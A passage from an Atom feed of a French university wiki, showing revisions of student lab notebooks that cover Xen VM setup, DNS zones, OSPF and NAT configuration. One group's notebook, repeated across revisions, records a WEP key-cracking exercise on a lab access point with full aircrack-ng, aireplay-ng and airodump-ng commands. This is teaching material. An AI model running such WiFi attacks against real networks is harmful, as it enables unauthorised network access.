== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52974</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52974"/>
				<updated>2020-11-02T13:49:40Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Installation VirtualMachine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
gestion IP4&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0&lt;br /&gt;
3. enable&lt;br /&gt;
4. conf t&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
6. exit&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
accès ssh ok (modif /etc/ssh/sshd_config)&lt;br /&gt;
&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @	IN	SOA	ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
			      6		; Serial&lt;br /&gt;
			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.clavaire.site.&lt;br /&gt;
 ns1	IN	A	193.48.57.186&lt;br /&gt;
 www	IN	A       193.48.57.186	&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute === &lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=52937</id>
		<title>TP sysres IMA5sc 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=52937"/>
				<updated>2020-11-02T10:01:02Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| GURY Evan &amp;amp; DUBOIS Vincent&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| BARGIBANT Quentin &amp;amp; LAGNEAU Alex&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| SIMONIN Richard &amp;amp; MERTZ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| BENAYED Samuel &amp;amp; EVRARD Théo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| RINGOT Loïc &amp;amp; SANCHEZ Pierre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| NDUWAMUNGU Jean De Dieu &amp;amp; MOINAT Théau&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| EKHLAS EID Nour &amp;amp; BISALLI Clara&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| SOULAIMANI Jawad &amp;amp; TEKIN Kadir&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| VIEUBLED Tanguy &amp;amp; VERNIER Paul&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| MALTI Hind &amp;amp; AHOUASSOU Loris&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| DARDENNE Sébastien &amp;amp; CALLERISA Corto&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NORMAND Quentin &amp;amp; CLAUDEL Maxime&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G13 | Cahier groupe n°13]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]&lt;br /&gt;
| FAUCHOIS Lukas &amp;amp; ROUILLÉ Guillaume&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Plan d'adressage==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 314&lt;br /&gt;
| 100.64.0.16&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.176&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| 312&lt;br /&gt;
| 100.64.0.17&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.177&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 311&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 310&lt;br /&gt;
| 100.64.0.19&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.179&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 309&lt;br /&gt;
| 100.64.0.20&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.180&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 308&lt;br /&gt;
| 100.64.0.21&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.181&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 307&lt;br /&gt;
| 100.64.0.22&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.182&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 306&lt;br /&gt;
| 100.64.0.23&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.183&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 305&lt;br /&gt;
| 100.64.0.24&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.184&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 304&lt;br /&gt;
| 100.64.0.25&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.185&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| clavaire.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 303&lt;br /&gt;
| 100.64.0.26&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.186&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| 302&lt;br /&gt;
| 100.64.0.27&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation du réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Branchement du matériel ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]&lt;br /&gt;
&lt;br /&gt;
=== Connexions entre équipements ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te1/1/1&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/5&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| AAA&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/5&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.1/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Eth5&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/4&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.12/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 1G&lt;br /&gt;
| Te1/1/3&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.2/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Eth4&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| AAA&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Gi1/0/1&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.13/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| SDSL&lt;br /&gt;
| Cuivre&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage de l'OSPF ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
  router-id 10.60.0.2                                   # on change simplement l'id du routeur par rapport au 6509-E&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
  redistribute connected subnets                       &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage NAT ===&lt;br /&gt;
&lt;br /&gt;
L'objectif du NAT est de faire la translation ip_privee&amp;lt;-&amp;gt;ip_publique entre les VM et l'extérieur&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
[A COMPLETER]&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    ip nat inside source static local-ip global-ip&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat inside&lt;br /&gt;
    exit&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat outside&lt;br /&gt;
    end&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52921</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52921"/>
				<updated>2020-11-02T07:42:55Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Installation VirtualMachine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
gestion IP4&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0&lt;br /&gt;
3. enable&lt;br /&gt;
4. conf t&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
6. exit&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
accès ssh ok (modif /etc/ssh/sshd_config)&lt;br /&gt;
&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute === &lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52758</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52758"/>
				<updated>2020-10-15T09:56:30Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Cassage de clef WEP d’un point d’accès WiFi */&lt;/p&gt;
